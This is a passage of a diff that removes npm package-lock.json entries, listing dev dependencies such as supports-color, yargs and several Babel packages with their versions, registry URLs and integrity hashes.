"sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", - "integrity": "sha512-OztqDenkfFkbSG+tRxBeAnCVPckDBcvibKd35yDONx6OU8N7sqgwc7rCbkJ/WcYtVRZ4ba68d6byhC21GFh7sQ==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "browserslist-lint": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.20.14", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.20.14.tgz", - "integrity": "sha512-0YpKHD6ImkWMEINCyDAD0HLLUH/lPCefG8ld9it8DJB2wnApraKuhgYTvTY1z7UFIfBTGy5LwncZ+5HWWGbhFw==", - "dev": true - }, - "@babel/core": { - "version": "7.20.12", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.20.12.tgz", - "integrity": "sha512-XsMfHovsUYHFMdrIHkZphTN/2Hzzi78R08NuHfDBehym2VsPDL6Zn/JAD/JQdnRvbSsbQc4mVaU1m6JgtTEElg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.1.0", - "@babel/code-frame": "^7.18.6", - "@babel/generator": "^7.20.7", - "@babel/helper-compilation-targets": "^7.20.7", - "@babel/helper-module-transforms": "^7.20.11", - "@babel/helpers": "^7.20.7", - "@babel/parser": "^7.20.7", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.12", - "@babel/types": "^7.20.7", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "dependencies": { - "@jridgewell/gen-mapping": { - "version": "0.3.2", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.2.tgz", - "integrity": "sha512-mh65xKQAzI6iBcFzwv28KVWSmCkdRBWoOh+bYQGW3+6OZvbbN3TqMGo5hqYxQniRcH9F2VZIoJCm4pa3BPDK/A==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - } - } - }, - "@babel/helper-compilation-targets": { - "version": "7.20.7", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.20.7.tgz", - "integrity": "sha512-4tGORmfQcrc+bvrjb5y3dG9Mx1IOZjsHqQVUz7XCNHO+iTmqxWnVg3KRygjGmpRLJGdQSKuvFinbIb0CnZwHAQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.20.5", - "@babel/helper-validator-option": "^7.18.6", - "browserslist": "^4.21.3", - "lru-cache": "^5.1.1", - "semver": "^6.3.0" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.18.6.tgz", - "integrity": "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA==", - "dev": true, - "requires": { - "@babel/types": "^7.18.6" - } - }, - "@babel/helper-module-transforms": { - "version": "7.20.11", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.20.11.tgz", - "integrity": "sha512-uRy78kN4psmji1s2QtbtcCSaj/LILFDp0f/ymhpQH5QY3nljUZCaNWz9X1dEj/8MBdBEFECs7yRhKn8i7NjZgg==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.18.9", - "@babel/helper-module-imports": "^7.18.6", - "@babel/helper-simple-access": "^7.20.2", - "@babel/helper-split-export-declaration": "^7.18.6", - "@babel/helper-validator-identifier": "^7.19.1", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.10", - "@babel/types": "^7.20.7" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.20.2.tgz", - "integrity": "sha512-+0woI/WPq59IrqDYbVGfshjT5Dmk/nnbdpcF8SnMhhXObpTq2KNBdLFRFrkVdbDOyUmHBCxzm5FHV1rACIkIbA==", - "dev": true, - "requires": { - "@babel/types": "^7.20.2" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.18.6.tgz", - "integrity": "sha512-XO7gESt5ouv/LRJdrVjkShckw6STTaB7l9BrpBaAHDeF5YZT+01PCwmR0SJHnkW6i8OwW/EVWRShfi4j2x+KQw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.20.13", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.20.13.tgz", - "integrity": "sha512-nzJ0DWCL3gB5RCXbUO3KIMMsBY2Eqbx8mBpKGE/02PgyRQFcPQLbkQ1vyy596mZLaP+dAfD+R4ckASzNVmW3jg==", - "dev": true, - "requires": { - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.13", - "@babel/types": "^7.20.7" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.18.6" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": 